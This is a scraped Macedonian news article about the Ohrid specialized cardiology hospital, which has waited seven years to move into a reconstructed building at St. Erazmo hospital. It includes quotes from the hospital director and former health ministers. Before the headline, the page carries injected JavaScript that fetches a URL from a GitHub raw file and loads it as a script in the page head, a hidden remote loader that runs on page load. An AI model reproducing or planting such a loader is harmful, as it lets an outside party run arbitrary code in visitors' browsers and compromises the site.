;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Охридската кардиологија чека седум години за отворање на нов болнички блок - Антропол
АктуелноЛокално

Охридската кардиологија чека седум години за отворање на нов болнички блок

Специјализираната охридска болница за превенција, лекување и рехабилитација на кардиоваскуларни заболувања со години чека да се префрли во новиот објект на болницата „Свети Еразмо“. Установата која ги згрижува животно загрозените пациенти има потреба од дополнителен простор, но новиот болнички блок, добиен со комплетната реконструкција на Специјалната болница за ортопедија и трауматологија „Свети Еразмо“ во Охрид, сè уште не е пуштен во употреба.

„Нашата болница со години бележи постојан пораст на бројот и видот на здравствени услуги во сите свои оддели. Како резултат на тоа, веќе одамна нашите просторни и технички услови не ги задоволуваат во целост нашите потреби за давање брза, квалитетна и сеопфатна кардиоваскуларна грижа. Уште во 2013 година се роди идејата за изградба на нов простор, која беше поддржана од тогашните здравствени власти. Следеа изработка на проект и почеток на неговата реализација во 2014, што подразбираше доизградба на веќе постоечки објект во кругот на болницата ‘Св. Еразмо‘. Со променлива динамика течеа градежните активности и ние се надевавме на брзо ставање во функција на овој објект, што требаше да значи и почнување со една нова и исклучително важна дејност – третман на акутен мозочен удар“, вели директорката на Специјализираната болница за кардиологија, д-р Елена Коваческа-Башуроска.

Инвестицијата вредна 215 милиони денари (околи 3,5 милиони евра), која првично требаше да биде готова до април 2017, беше најавувана како една од најзначајните. По застојот во 2018, тогашниот министер Венко Филипче даде нов рок за завршување на објектот, септември 2019. Но, новиот објект до денес не е пуштен во употреба, оти имало недефинирани односи помеѓу Министерството за здравство и инвеститорот.

„Со моето доаѓање ревидиравме еден дел од недефинираните односи помеѓу изведувачот и Министерството за здравство. Тука имаше еден мал застој, кој, за жал, трае со години. Поради пет отсто од целиот проект се стопирани завршувањето и техничкото примопредавање на објектот. Очекувам сите тие правни процедури да завршат до крајот на годината и се надевам дека во јануари ќе биде отворањето“, уверуваше лани Беким Сали како министер за здравство, но болничката зграда не се отвори ни со почетокот на оваа година.

Од Министерството за здравство и новиот министер Фатмир Меџити не добивме одговор на нашето прашање кога конечно ќе се отвори новиот објект.

Со проектот се реновираше и адаптираше постојниот објект на „Св. Еразмо“, вклучувајќи ги и потребите на Специјализираната болница за кардиоваскуларни заболувања. Комплетната реконструкција опфати површина од вкупно 5.623 квадратни метри, на која има амбуланти, лаборатории, операциони сали и современи болнички оддели.

Со доградбата на централната, стара болничка зграда, предвидено е во карабината да се имплементираат содржините кои потребни за Специјализираната болница за кардиоваскуларни заболувања, како Адултна кардиологија со амбуланти, дијагностика и дневна болница и Интервентна кардиологија со интензивна и полуинтензивна нега, која содржи оперативен блок со операциона сала за пејсмејкер, ангиографска сала, сала за радиофреквентна аблација и простории за персонал.

Охридската болница за кардиоваскуларни заболувања располага со 30 лекари, од кои 12 супспецијалисти-кардиолози и овој врвен и професионален кадар изведува над 2.000 дијагностички и интервенти процедури годишно. Императив на болницата во претстојниот период е третман на акутен мозочен удар со перкутана интервенција.

„Близината на болницата ‘Св. Еразмо‘ создава услови за брза, софистицирана дијагностика и го докомплетира тимот за мозочен удар со своите кадри од областа на радиодијагностика, неврологија и неврохирургија. Постоењето на центар за мозочен удар е предуслов за современ третман на оваа исклучително тешка, честа и животозагрозувачка состојба. Конзервативниот третман на оваа состојба, за жал, не ги дава посакуваните резултати и доколку преживеат, пациентите најчесто остануваат со трајни секвели и многу често живеат зависни од туѓа грижа. Модерниот третман подразбира интервентни процедури кои значајно го подобруваат исходот од оваа болест. Апелираме на што побрза разврска на сите административни и останати пречки, заради што побрзо заокружување на овој проект и негово ставање во функција“, додава Коваческа-Башуроска.

Преземено од СДК.мк – С. Вренцовска